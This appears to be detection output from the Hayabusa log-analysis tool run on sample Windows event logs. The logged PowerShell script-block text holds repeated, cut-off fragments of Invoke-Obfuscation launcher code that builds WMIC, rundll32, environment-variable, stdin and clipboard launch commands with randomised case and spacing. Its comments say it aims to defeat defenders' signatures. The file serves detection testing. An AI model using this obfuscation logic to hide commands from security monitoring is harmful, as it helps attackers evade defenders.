$SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. 
$RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. 
$ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. 
$PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). 
$PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. 
$PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. 
